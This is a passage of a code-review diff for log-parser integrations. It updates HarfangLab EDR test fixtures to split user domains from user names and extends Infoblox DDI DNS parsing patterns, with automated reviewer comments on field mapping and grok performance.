\"11111111-2222-3333-4444-555555555555\"}, {\"name\": \"Postes de travail : Lot 3\", \"id\": \"66666666-7777-8888-9999-000000000000\"}], \"status\": \"new\", \"execution\": 0, \"agent\": {\"agentid\": \"11111111-aaaa-2222-bbbb-333333333333\", \"domain\": null, \"osproducttype\": \"Windows 10 Enterprise\", \"ostype\": \"windows\", \"dnsdomainname\": \"domain.com\", \"distroid\": null, \"domainname\": \"NT_DOMAIN\", \"osversion\": \"10.0.19045\", \"hostname\": \"PC01\", \"version\": \"4.1.6\", \"additional_info\": {}}, \"threat_key\": \"20528\", \"mitre_cells\": [\"persistence__t1078.003\", \"persistence__t1098\", \"privilege-escalation__t1078.003\", \"privilege-escalation__t1098\"], \"alert_unique_id\": \"aaaaaaaa-1111-bbbb-2222-cccccccccccc\", \"log_type\": \"alert\", \"@version\": \"1\", \"msg\": \"Detects when a user account is added into the local Administrators group.\\n This action can be the result of a malicious activity.\", \"alert_subtype\": \"eventlog\", \"detection_origin\": \"agent\"}", + "sekoiaio": { + "intake": { + "dialect": "HarfangLab EDR", + "dialect_uuid": "3c7057d3-4689-4fae-8033-6f1f887a70f2" + } + } + }, + "expected": { + "message": "{\"type\": \"rtlogs\", \"level\": \"medium\", \"maturity\": \"stable\", \"quarantine\": 4, \"rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: 
S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"alert_time\": \"2024-11-12T08:39:14.017+00:00\", \"rule_name\": \"User Account Added to the Local Administrators Group\", \"tags\": [\"attack.persistence\", \"attack.privilege_escalation\", \"attack.t1078.003\", \"attack.t1098\"], \"level_int\": 30, \"eventlog\": {\"level\": \"log_always\", \"type\": \"wineventlog\", \"detection_timestamp\": \"2024/11/12 08:39:13.967\", \"event_id\": 4732, \"event_data\": {\"SubjectUserSid\": \"S-1-2-4-5-6\", \"SubjectDomainName\": \"NT_DOMAIN\", \"PrivilegeList\": \"-\", \"TargetDomainName\": \"Builtin\", \"TargetUserName\": \"Administrateurs\", \"MemberSid\": \"S-1-2-4-7-8\", \"MemberName\": \"NT_DOMAIN\\\\DOEJ\", \"SubjectUserName\": \"sw-suser\", \"TargetSid\": \"S-1-2-3-4\", \"SubjectLogonId\": \"0x1234567\"}, \"record_number\": 174136362, \"event_date\": \"2024-11-12T08:39:13.205Z\", \"sigma_rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate 
administrator action\\nlevel: medium\", \"source_name\": \"Microsoft-Windows-Security-Auditing\", \"dont_create_eventlog\": true, \"user\": {\"domain\": \"\", \"name\": \"\", \"type\": \"unknown\", \"identifier\": \"\"}, \"thread_id\": 1728, \"log_name\": \"Security\", \"process_id\": 1224, \"status\": 0, \"ioc_matches\": [], \"provider_guid\": \"54849625-5478-4994-a5ba-3e3b0328c30d\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"log_type\": \"eventlog\", \"computer_name\": \"PC01.domain.com\", \"user_data\": {}, \"system_event_type\": \"event_log_event\"}, \"threat_values\": [], \"destination\": \"syslog\", \"@timestamp\": \"2024-11-12T08:39:14.017Z\", \"detection_date\": \"2024-11-12T08:39:13.967+00:00\", \"@event_create_date\": \"2024-11-12T08:39:14.017Z\", \"aggregation_key\": \"8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb\", \"alert_type\": \"sigma\", \"rule_id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"ingestion_date\": \"2024-11-12T08:39:14.017+00:00\", \"tenant\": \"3b37ffc8520ef542\", \"threat_type\": \"new\", \"groups\": [{\"name\": \"Postes de travail\", \"id\": \"11111111-2222-3333-4444-555555555555\"}, {\"name\": \"Postes de travail : Lot 3\", \"id\": \"66666666-7777-8888-9999-000000000000\"}], \"status\": \"new\", \"execution\": 0, \"agent\": {\"agentid\": \"11111111-aaaa-2222-bbbb-333333333333\", \"domain\": null, \"osproducttype\": \"Windows 10 Enterprise\", \"ostype\": \"windows\", \"dnsdomainname\": \"domain.com\", \"distroid\": null, \"domainname\": \"NT_DOMAIN\", \"osversion\": \"10.0.19045\", \"hostname\": \"PC01\", \"version\": \"4.1.6\", \"additional_info\": {}}, \"threat_key\": \"20528\", \"mitre_cells\": [\"persistence__t1078.003\", \"persistence__t1098\", \"privilege-escalation__t1078.003\", \"privilege-escalation__t1098\"], \"alert_unique_id\": \"aaaaaaaa-1111-bbbb-2222-cccccccccccc\", \"log_type\": \"alert\", \"@version\": \"1\", \"msg\": \"Detects when a user account is added into the local 
Administrators group.\\n This action can be the result of a malicious activity.\", \"alert_subtype\": \"eventlog\", \"detection_origin\": \"agent\"}",
+ "event": {
+ "dataset": "alert",
+ "kind": "alert",
+ "type": [
+ "info"
+ ]
+ },
+ "@timestamp": "2024-11-12T08:39:14.017000Z",
+ "action": {
+ "properties": {
+ "MemberName": "DOEJ",
+ "SubjectDomainName": "NT_DOMAIN",
+ "SubjectLogonId": "0x1234567",
+ "SubjectUserName": "sw-suser",
+ "SubjectUserSid": "S-1-2-4-5-6",
+ "TargetDomainName": "Builtin",
+ "TargetSid": "S-1-2-3-4",
+ "TargetUserName": "Administrateurs"
+ }
+ },
+ "agent": {
+ "id": "11111111-aaaa-2222-bbbb-333333333333",
+ "name": "harfanglab"
+ },
+ "harfanglab": {
+ "aggregation_key": "8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb",
+ "alert_subtype": "eventlog",
+ "alert_time": "2024-11-12T08:39:14.017+00:00",
+ "alert_unique_id": "aaaaaaaa-1111-bbbb-2222-cccccccccccc",
+ "execution": 0,
+ "groups": [
+ "{\"id\": \"11111111-2222-3333-4444-555555555555\", \"name\": \"Postes de travail\"}",
+ "{\"id\": \"66666666-7777-8888-9999-000000000000\", \"name\": \"Postes de travail : Lot 3\"}"
+ ],
+ "level": "medium",
+ "status": "new",
+ "threat_key": "20528"
+ },
+ "host": {
+ "domain": "NT_DOMAIN",
+ "hostname": "PC01",
+ "name": "PC01",
+ "os": {
+ "full": "Windows 10 Enterprise",
+ "version": "10.0.19045"
+ }
+ },
+ "log": {
+ "hostname": "PC01"
+ },
+ "organization": {
+ "id": "3b37ffc8520ef542"
+ },
+ "related": {
+ "hosts": [
+ "PC01"
+ ],
+ "user": [
+ "sw-suser"
+ ]
+ },
+ "rule": {
+ "category": "sigma",
+ "description": "Detects when a user account is added into the local Administrators group.\n This action can be the result of a malicious activity.",
+ "id": "12345678-abcd-ef90-1234-123456abcdef",
+ "name": "User Account Added to the Local Administrators Group"
+ },
+ "user": {
+ "domain": "NT_DOMAIN",
+ "name": "sw-suser",
+ "roles": "Postesdetravail,Postesdetravail:Lot3",
+ "target": {
+ "domain": "Builtin",
+ "name": 
"Administrateurs"
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/HarfangLab/harfanglab/tests/alert_false_positive.json b/HarfangLab/harfanglab/tests/alert_false_positive.json
index f01c2921f..99b1994fb 100644
--- a/HarfangLab/harfanglab/tests/alert_false_positive.json
+++ b/HarfangLab/harfanglab/tests/alert_false_positive.json
@@ -76,7 +76,7 @@
 "pc123"
 ],
 "user": [
- "XXX\\XXX"
+ "XXX"
 ]
 },
 "rule": {
@@ -86,7 +86,8 @@
 "name": "Discovery: Process list"
 },
 "user": {
- "name": "XXX\\XXX"
+ "domain": "XXX",
+ "name": "XXX"
 }
 }
 }
\ No newline at end of file
diff --git a/HarfangLab/harfanglab/tests/authentication.json b/HarfangLab/harfanglab/tests/authentication.json
index 91af4cc19..a00b26310 100644
--- a/HarfangLab/harfanglab/tests/authentication.json
+++ b/HarfangLab/harfanglab/tests/authentication.json
@@ -58,7 +58,7 @@
 "127.0.0.1"
 ],
 "user": [
- "test-domain\\work-laptop$"
+ "work-laptop$"
 ]
 },
 "sekoiaio": {
@@ -78,12 +78,14 @@
 "ip": "127.0.0.1"
 },
 "user": {
+ "domain": "test-domain",
 "id": "S-1-5-18",
- "name": "test-domain\\work-laptop$",
+ "name": "work-laptop$",
 "roles": "custom-group",
 "target": {
+ "domain": "work-laptop",
 "id": "S-1-0-0",
- "name": "work-laptop\\administrateur"
+ "name": "administrateur"
 }
 }
 }
diff --git a/HarfangLab/harfanglab/tests/authentication_2.json b/HarfangLab/harfanglab/tests/authentication_2.json
new file mode 100644
index 000000000..0f5d169e9
--- /dev/null
+++ b/HarfangLab/harfanglab/tests/authentication_2.json
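Review bot: The expected `user.roles` value `Postesdetravail,Postesdetravail:Lot3` pins a lossy rendering of the HarfangLab group names: the spaces in `Postes de travail` and `Postes de travail : Lot 3` are stripped and both names are joined into one comma-separated string, so the role can no longer be matched back to the group it came from and ECS consumers that expect one keyword per role cannot split it reliably. The same fixture drops the `NT_DOMAIN\` prefix of `MemberName` in `action.properties` without recording the domain anywhere else, although for a local-Administrators membership change the domain of the added account is what an analyst needs first. The parser stage that builds these values is outside this diff, so this is inferred from the expected output; if the normalisation is deliberate it should be stated in the intake documentation, otherwise the fixture should expect the names verbatim, e.g. `"roles": ["Postes de travail", "Postes de travail : Lot 3"]`.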
@@ -0,0 +1,103 @@ +{ + "input": { + "message": "{\"event_data\": {\"RestrictedAdminMode\": \"-\", \"SubjectUserName\": \"-\", \"SubjectUserSid\": \"S-1-0-0\", \"TargetOutboundUserName\": \"-\", \"ElevatedToken\": \"%%1843\", \"VirtualAccount\": \"%%1843\", \"ProcessId\": \"0x0\", \"AuthenticationPackageName\": \"NTLM\", \"LogonProcessName\": \"NtLmSsp\", \"IpPort\": \"-\", \"WorkstationName\": \"WORKSTATION_NAME\", \"LogonGuid\": \"{00000000-0000-0000-0000-000000000000}\", \"IpAddress\": \"-\", \"TargetLinkedLogonId\": \"0x0\", \"SubjectDomainName\": \"-\", \"TargetOutboundDomainName\": \"-\", \"ImpersonationLevel\": \"%%1833\", \"SubjectLogonId\": \"0x0\", \"TargetLogonId\": \"0x6accabcc3\", \"LogonType\": \"3\", \"TargetUserSid\": \"S-1-5-21-11111111111-111111111111-11111111-111\", \"LmPackageName\": \"NTLM V2\", \"TargetUserName\": \"johndoe\", \"TransmittedServices\": \"-\", \"TargetDomainName\": \"EXAMPLE\", \"ProcessName\": \"-\", \"KeyLength\": \"128\"}, \"groups\": [], \"type\": \"wineventlog\", \"computer_name\": \"example.local\", \"destination\": \"syslog\", \"record_number\": 177355019, \"@Version\": \"1\", \"log_name\": \"Security\", \"@event_create_date\": \"2024-11-05T11:10:19.543Z\", \"level\": \"log_always\", \"timestamp\": \"2024-11-05T11:10:20.274688148Z\", \"process_id\": 704, \"user_data\": {}, \"log_type\": \"eventlog\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"user\": {\"domain\": \"\", \"identifier\": \"\", \"name\": \"\", \"type\": \"unknown\"}, \"tenant\": \"11111111111111111111\", \"thread_id\": 9168, \"agent\": {\"dnsdomainname\": \"example.local\", \"osproducttype\": \"Windows Server 2022 Datacenter\", \"domain\": null, \"osversion\": \"10.0.20348\", \"ostype\": \"windows\", \"distroid\": null, \"domainname\": \"EXAMPLE\", \"additional_info\": {}, \"version\": \"4.1.6\", \"hostname\": \"EXAMPLE\", \"agentid\": \"555555555-9999-9999-9999-3e333333cccc\"}, \"event_id\": 4624, \"provider_guid\": 
\"555555555-9999-9999-9999-3e333333cccc\", \"source_name\": \"Microsoft-Windows-Security-Auditing\"}" + }, + "expected": { + "message": "{\"event_data\": {\"RestrictedAdminMode\": \"-\", \"SubjectUserName\": \"-\", \"SubjectUserSid\": \"S-1-0-0\", \"TargetOutboundUserName\": \"-\", \"ElevatedToken\": \"%%1843\", \"VirtualAccount\": \"%%1843\", \"ProcessId\": \"0x0\", \"AuthenticationPackageName\": \"NTLM\", \"LogonProcessName\": \"NtLmSsp\", \"IpPort\": \"-\", \"WorkstationName\": \"WORKSTATION_NAME\", \"LogonGuid\": \"{00000000-0000-0000-0000-000000000000}\", \"IpAddress\": \"-\", \"TargetLinkedLogonId\": \"0x0\", \"SubjectDomainName\": \"-\", \"TargetOutboundDomainName\": \"-\", \"ImpersonationLevel\": \"%%1833\", \"SubjectLogonId\": \"0x0\", \"TargetLogonId\": \"0x6accabcc3\", \"LogonType\": \"3\", \"TargetUserSid\": \"S-1-5-21-11111111111-111111111111-11111111-111\", \"LmPackageName\": \"NTLM V2\", \"TargetUserName\": \"johndoe\", \"TransmittedServices\": \"-\", \"TargetDomainName\": \"EXAMPLE\", \"ProcessName\": \"-\", \"KeyLength\": \"128\"}, \"groups\": [], \"type\": \"wineventlog\", \"computer_name\": \"example.local\", \"destination\": \"syslog\", \"record_number\": 177355019, \"@Version\": \"1\", \"log_name\": \"Security\", \"@event_create_date\": \"2024-11-05T11:10:19.543Z\", \"level\": \"log_always\", \"timestamp\": \"2024-11-05T11:10:20.274688148Z\", \"process_id\": 704, \"user_data\": {}, \"log_type\": \"eventlog\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"user\": {\"domain\": \"\", \"identifier\": \"\", \"name\": \"\", \"type\": \"unknown\"}, \"tenant\": \"11111111111111111111\", \"thread_id\": 9168, \"agent\": {\"dnsdomainname\": \"example.local\", \"osproducttype\": \"Windows Server 2022 Datacenter\", \"domain\": null, \"osversion\": \"10.0.20348\", \"ostype\": \"windows\", \"distroid\": null, \"domainname\": \"EXAMPLE\", \"additional_info\": {}, \"version\": \"4.1.6\", \"hostname\": \"EXAMPLE\", \"agentid\": 
\"555555555-9999-9999-9999-3e333333cccc\"}, \"event_id\": 4624, \"provider_guid\": \"555555555-9999-9999-9999-3e333333cccc\", \"source_name\": \"Microsoft-Windows-Security-Auditing\"}",
+ "event": {
+ "action": "authentication_network",
+ "category": [
+ "authentication"
+ ],
+ "code": "4624",
+ "dataset": "eventlog",
+ "provider": "Microsoft-Windows-Security-Auditing",
+ "type": [
+ "info",
+ "start"
+ ]
+ },
+ "@timestamp": "2024-11-05T11:10:19.543000Z",
+ "action": {
+ "id": 4624,
+ "outcome": "success",
+ "properties": {
+ "AuthenticationPackageName": "NTLM",
+ "ElevatedToken": "%%1843",
+ "ImpersonationLevel": "%%1833",
+ "KeyLength": "128",
+ "LmPackageName": "NTLM V2",
+ "LogonGuid": "{00000000-0000-0000-0000-000000000000}",
+ "LogonProcessName": "NtLmSsp",
+ "LogonType": "3",
+ "ProcessId": "0x0",
+ "SubjectLogonId": "0x0",
+ "SubjectUserSid": "S-1-0-0",
+ "TargetDomainName": "EXAMPLE",
+ "TargetLinkedLogonId": "0x0",
+ "TargetLogonId": "0x6accabcc3",
+ "TargetUserName": "johndoe",
+ "TargetUserSid": "S-1-5-21-11111111111-111111111111-11111111-111",
+ "VirtualAccount": "%%1843",
+ "WorkstationName": "WORKSTATION_NAME"
+ }
+ },
+ "agent": {
+ "id": "555555555-9999-9999-9999-3e333333cccc",
+ "name": "harfanglab"
+ },
+ "harfanglab": {
+ "groups": []
+ },
+ "host": {
+ "domain": "EXAMPLE",
+ "hostname": "EXAMPLE",
+ "name": "EXAMPLE",
+ "os": {
+ "full": "Windows Server 2022 Datacenter",
+ "version": "10.0.20348"
+ }
+ },
+ "log": {
+ "hostname": "EXAMPLE"
+ },
+ "organization": {
+ "id": "11111111111111111111"
+ },
+ "related": {
+ "hosts": [
+ "EXAMPLE"
+ ]
+ },
+ "sekoiaio": {
+ "authentication": {
+ "process": {
+ "name": "NtLmSsp"
+ }
+ },
+ "client": {
+ "name": "WORKSTATION_NAME",
+ "os": {
+ "type": "windows"
+ }
+ },
+ "server": {
+ "name": "EXAMPLE",
+ "os": {
+ "type": "windows"
+ }
+ }
+ },
+ "server": {
+ "domain": "EXAMPLE"
+ },
+ "user": {
+ "id": "S-1-0-0",
+ "target": {
+ "domain": "EXAMPLE",
+ "id": 
"S-1-5-21-11111111111-111111111111-11111111-111",
+ "name": "johndoe"
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/HarfangLab/harfanglab/tests/dns.json b/HarfangLab/harfanglab/tests/dns.json
index acf1cc407..903c7d68d 100644
--- a/HarfangLab/harfanglab/tests/dns.json
+++ b/HarfangLab/harfanglab/tests/dns.json
@@ -57,11 +57,12 @@
 "work-laptop"
 ],
 "user": [
- "test-domain\\john.doe"
+ "john.doe"
 ]
 },
 "user": {
- "name": "test-domain\\john.doe",
+ "domain": "test-domain",
+ "name": "john.doe",
 "roles": "custom-group"
 }
 }
diff --git a/HarfangLab/harfanglab/tests/network.json b/HarfangLab/harfanglab/tests/network.json
index 0a8eef023..e047efaf0 100644
--- a/HarfangLab/harfanglab/tests/network.json
+++ b/HarfangLab/harfanglab/tests/network.json
@@ -50,7 +50,7 @@
 "192.168.120.41"
 ],
 "user": [
- "NT AUTHORITY\\SYSTEM"
+ "SYSTEM"
 ]
 },
 "source": {
@@ -59,7 +59,8 @@
 "port": 21955
 },
 "user": {
- "name": "NT AUTHORITY\\SYSTEM"
+ "domain": "NT AUTHORITY",
+ "name": "SYSTEM"
 }
 }
 }
\ No newline at end of file
diff --git a/HarfangLab/harfanglab/tests/network2.json b/HarfangLab/harfanglab/tests/network2.json
index 43ba71477..b350a10ac 100644
--- a/HarfangLab/harfanglab/tests/network2.json
+++ b/HarfangLab/harfanglab/tests/network2.json
@@ -51,7 +51,7 @@
 "185.202.2.238"
 ],
 "user": [
- "NT AUTHORITY\\NETWORK SERVICE"
+ "NETWORK SERVICE"
 ]
 },
 "source": {
@@ -60,7 +60,8 @@
 "port": 42221
 },
 "user": {
- "name": "NT AUTHORITY\\NETWORK SERVICE"
+ "domain": "NT AUTHORITY",
+ "name": "NETWORK SERVICE"
 }
 }
 }
\ No newline at end of file
diff --git a/HarfangLab/harfanglab/tests/process-event.json b/HarfangLab/harfanglab/tests/process-event.json
index abbbd338b..9f1f078f3 100644
--- a/HarfangLab/harfanglab/tests/process-event.json
+++ b/HarfangLab/harfanglab/tests/process-event.json
@@ -81,11 +81,12 @@
 "SFRTAOA"
 ],
 "user": [
- "NT AUTHORITY\\SYSTEM"
+ "SYSTEM"
 ]
 },
 "user": {
- "name": "NT AUTHORITY\\SYSTEM",
+ "domain": "NT AUTHORITY",
+ "name": "SYSTEM",
 "roles": "Group1"
 }
 }
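Review bot: `user.id` is expected to be `S-1-0-0`, the null SID the event carries for its `-` subject, while the subject name is dropped; detections keyed on `user.id` therefore see a placeholder identifier, and the account that actually logged on (`johndoe`) is only reachable under `user.target`. If the parser copies `SubjectUserSid` unconditionally, it would be cleaner to leave `user.id` unset when the SID is `S-1-0-0`, which means removing `"id": "S-1-0-0",` from this fixture's `user` object. The mapping logic lives in the parser, outside this diff, so this is inferred from the expected output.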
diff --git a/HarfangLab/harfanglab/tests/process.json b/HarfangLab/harfanglab/tests/process.json
index c91f0a2c0..024f674a3 100644
--- a/HarfangLab/harfanglab/tests/process.json
+++ b/HarfangLab/harfanglab/tests/process.json
@@ -74,11 +74,12 @@
 "EXCHANGE"
 ],
 "user": [
- "NT AUTHORITY\\SYSTEM"
+ "SYSTEM"
 ]
 },
 "user": {
- "name": "NT AUTHORITY\\SYSTEM"
+ "domain": "NT AUTHORITY",
+ "name": "SYSTEM"
 }
 }
 }
\ No newline at end of file
diff --git a/HarfangLab/harfanglab/tests/process2.json b/HarfangLab/harfanglab/tests/process2.json
index f01c2921f..99b1994fb 100644
--- a/HarfangLab/harfanglab/tests/process2.json
+++ b/HarfangLab/harfanglab/tests/process2.json
@@ -76,7 +76,7 @@
 "pc123"
 ],
 "user": [
- "XXX\\XXX"
+ "XXX"
 ]
 },
 "rule": {
@@ -86,7 +86,8 @@
 "name": "Discovery: Process list"
 },
 "user": {
- "name": "XXX\\XXX"
+ "domain": "XXX",
+ "name": "XXX"
 }
 }
 }
\ No newline at end of file
diff --git a/HarfangLab/harfanglab/tests/process3.json b/HarfangLab/harfanglab/tests/process3.json
index 035f70d0f..3e464ccab 100644
--- a/HarfangLab/harfanglab/tests/process3.json
+++ b/HarfangLab/harfanglab/tests/process3.json
@@ -74,11 +74,12 @@
 "REDACTED"
 ],
 "user": [
- "NT AUTHORITY\\NETWORK SERVICE"
+ "NETWORK SERVICE"
 ]
 },
 "user": {
- "name": "NT AUTHORITY\\NETWORK SERVICE"
+ "domain": "NT AUTHORITY",
+ "name": "NETWORK SERVICE"
 }
 }
 }
\ No newline at end of file
diff --git a/HarfangLab/harfanglab/tests/process4.json b/HarfangLab/harfanglab/tests/process4.json
index a19bf13fc..3f32333c2 100644
--- a/HarfangLab/harfanglab/tests/process4.json
+++ b/HarfangLab/harfanglab/tests/process4.json
@@ -87,11 +87,12 @@
 "jdoe"
 ],
 "user": [
- "TST USER\\SYSTEM"
+ "SYSTEM"
 ]
 },
 "user": {
- "name": "TST USER\\SYSTEM",
+ "domain": "TST USER",
+ "name": "SYSTEM",
 "roles": "test_group"
 }
 }
diff --git a/HarfangLab/harfanglab/tests/threat_critical.json b/HarfangLab/harfanglab/tests/threat_critical.json
index 94e83a1fd..ce1d2faa4 100644
--- a/HarfangLab/harfanglab/tests/threat_critical.json
+++ b/HarfangLab/harfanglab/tests/threat_critical.json
@@ -13,6 +13,9 @@
 "name": "harfanglab"
 },
 "harfanglab": {
+ "agent_ids": [
+ "af5e2f63-becd-4660-ade8-30d04c0dd044"
+ ],
 "count": {
 "rules": 1,
 "users_impacted": 0
diff --git a/HarfangLab/harfanglab/tests/threat_log.json b/HarfangLab/harfanglab/tests/threat_log.json
index dcab41c28..bed91707b 100644
--- a/HarfangLab/harfanglab/tests/threat_log.json
+++ b/HarfangLab/harfanglab/tests/threat_log.json
@@ -13,6 +13,10 @@
 "name": "harfanglab"
 },
 "harfanglab": {
+ "agent_ids": [
+ "215fe295-905f-4a8d-8347-e9d438d4e415",
+ "999ba0c7-96b8-4c57-bf0e-63b24813c873"
+ ],
 "count": {
 "rules": 4,
 "users_impacted": 3
diff --git a/Infoblox/ddi/_meta/fields.yml b/Infoblox/ddi/_meta/fields.yml
index 064d69713..947dad6cf 100644
--- a/Infoblox/ddi/_meta/fields.yml
+++ b/Infoblox/ddi/_meta/fields.yml
@@ -2,3 +2,28 @@ infoblox.ddi.category:
 description: The logging category of this event.
 name: infoblox.ddi.category
 type: keyword
+
+infoblox.dhcp.circuit_id:
+ description: The circuit ID.
+ name: infoblox.dhcp.circuit_id
+ type: keyword
+
+infoblox.dhcp.interface_ip:
+ description: The IP address of the interface.
+ name: infoblox.dhcp.interface_ip
+ type: ip
+
+infoblox.dhcp.lease_time:
+ description: The lease time.
+ name: infoblox.dhcp.lease_time
+ type: keyword
+
+infoblox.dhcp.router_ip:
+ description: The IP address of the router.
+ name: infoblox.dhcp.router_ip
+ type: ip
+
+infoblox.dhcp.trans_id:
+ description: The transaction ID.
+ name: infoblox.dhcp.trans_id
+ type: keyword
diff --git a/Infoblox/ddi/_meta/smart-descriptions.json b/Infoblox/ddi/_meta/smart-descriptions.json
index 32aeb23c0..86ef44018 100644
--- a/Infoblox/ddi/_meta/smart-descriptions.json
+++ b/Infoblox/ddi/_meta/smart-descriptions.json
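Review bot: `infoblox.dhcp.lease_time` is declared `type: keyword`, which rules out range queries and numeric aggregations if the value is the lease duration in seconds; if it is, `type: long` would serve detection rules better, and the unit should then be named in the description. The new descriptions are otherwise tautological (`The circuit ID.`, `The transaction ID.`, `The lease time.`) and should say what the value is, e.g. `The DHCP relay-agent circuit ID identifying the client's access circuit.` and `The DHCP transaction ID shared by a request and its reply.` The DHCP log format these fields are extracted from is not in this diff, so confirm the lease_time unit before changing the type.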
@@ -16,5 +16,32 @@ "type": "request resolution of" } ] + }, + { + "value": "{source.ip} perform {event.action}", + "conditions": [ + { + "field": "source.ip" + }, + { + "field": "event.action" + } + ] + }, + { + "value": "Query from {source.ip}", + "conditions": [ + { + "field": "source.ip" + } + ] + }, + { + "value": "Query to {destination.ip}", + "conditions": [ + { + "field": "destination.ip" + } + ] } ] diff --git a/Infoblox/ddi/ingest/parser.yml b/Infoblox/ddi/ingest/parser.yml index 25264fc22..c84be32fe 100644 --- a/Infoblox/ddi/ingest/parser.yml +++ b/Infoblox/ddi/ingest/parser.yml @@ -5,7 +5,7 @@ pipeline: name: grok.match properties: output_field: message - pattern: "%{CLIENT}" + pattern: "%{DNS_FORMERR}|%{DNS_OTHER}|%{DNS_0}|%{DNS_1}|%{DNS_2}|%{DNS_3}|%{DNS_4}|%{DNS_5}|%{DNS_6}|%{DNS_7}|%{DNS_8}|%{DNS_9}|%{DNS_10}|%{DNS_11}|%{DNS_12}|%{DNS_13}|%{DNS_14}" custom_patterns: QUERY_FLAGS: "%{QUERY_FLAGS_RD:flags_rd}%{QUERY_FLAGS_EDNS:flags_edns}?%{QUERY_FLAGS_TCP:flags_tcp}?%{QUERY_FLAGS_DNSSEC:flags_dnssec}?%{QUERY_FLAGS_CD:flags_cd}?%{QUERY_FLAGS_DNS_SERVER_COOKIE}?%{QUERY_FLAGS_DNS_SERVER_COOKIE_WITHOUT_VALID_SERVER}?" QUERY_FLAGS_RD: '[\+\-]' 
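Review bot: The new template `{source.ip} perform {event.action}` is ungrammatical for a single source; it should read `{source.ip} performs {event.action}`. The three new entries also look like fallbacks ordered from most to least specific, which presumably means `Query from {source.ip}` always wins over `Query to {destination.ip}` when both fields are set — fine if intended, but worth a quick check against how this file's entries are evaluated.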
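Review bot: Replacing `%{CLIENT}` with the long alternation changes the captured field names — the old `CLIENT` (removed in the next hunk) wrote `category`, `src` and `spt`, while the new patterns write `infoblox_nios_log_dns_category`, `client_ip` and `client_port` — so every later stage that reads `message.src`, `message.spt` or `message.category` must be updated in the same commit; those stages are outside this diff, so I cannot confirm they were. The alternation also references `DNS_FORMERR` and `DNS_OTHER`, whose definitions are not in the part of `custom_patterns` visible here. Because most alternatives start with an optional group followed by `%{CLIENT}` and contain several `%{DATA}`/`%{GREEDYDATA}` captures, a line that matches none of them is retried at every offset for each alternative if grok.match is unanchored, which is costly on high-volume DNS logs; anchoring the pattern or moving the alternation into one named custom pattern (`DNS: "%{DNS_FORMERR}|…|%{DNS_14}"` with `pattern: "%{DNS}"`) would keep the top-level stage readable and make that cost easier to reason about.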
@@ -16,30 +16,165 @@ pipeline: QUERY_FLAGS_CD: "C" QUERY_FLAGS_DNS_SERVER_COOKIE: "V" QUERY_FLAGS_DNS_SERVER_COOKIE_WITHOUT_VALID_SERVER: "K" - CLIENT: '(%{WORD:category}: )?client ?(%{DATA}) %{IP:src}#%{INT:spt} (%{DATA}): query: %{IPORHOST:dns_question_name} %{WORD:dns_question_class} %{WORD:dns_question_type} %{QUERY_FLAGS} \(%{IP}\)' + CLIENT: "client (?:%{DATA} )?%{IP:client_ip}#%{NUMBER:client_port}:?" + VIEW: "view %{DATA:infoblox_nios_log_view}: " + + # Next patterns are inspired by + # https://github.com/elastic/integrations/blob/main/packages/infoblox_nios/data_stream/log/elasticsearch/ingest_pipeline/pipeline_dns.yml + DNS_1: "zone %{DATA:dns_question_name}/%{DATA:dns_question_class}: notify from %{IP:client_ip}#%{NUMBER:client_port}:? %{GREEDYDATA:infoblox_nios_log_dns_message}" + DNS_2: "transfer of '%{DATA:dns_question_name}/%{DATA:dns_question_class}' from %{IP:client_ip}#%{NUMBER:client_port}:? %{GREEDYDATA:infoblox_nios_log_dns_message}" + DNS_3: "validating %{DATA:dns_question_name}/%{WORD:dns_question_type}: %{GREEDYDATA:infoblox_nios_log_dns_message}" + DNS_4: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} updating zone '%{DATA:dns_question_name}/%{DATA:dns_question_class}': %{GREEDYDATA:infoblox_nios_log_dns_message}" + DNS_5: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} \\(%{DATA}\\): %{VIEW}?query failed %{GREEDYDATA:infoblox_nios_log_dns_message}" + DNS_6: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} \\(%{DATA:infoblox_nios_log_dns_before_query}\\): rewriting query name %{DATA} to '%{DATA:infoblox_nios_log_dns_after_query}', type %{DATA:dns_question_type}" + DNS_7: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} \\(%{DATA}\\): %{VIEW}?query: %{DATA:dns_question_name} %{DATA:dns_question_class} %{WORD:dns_question_type} 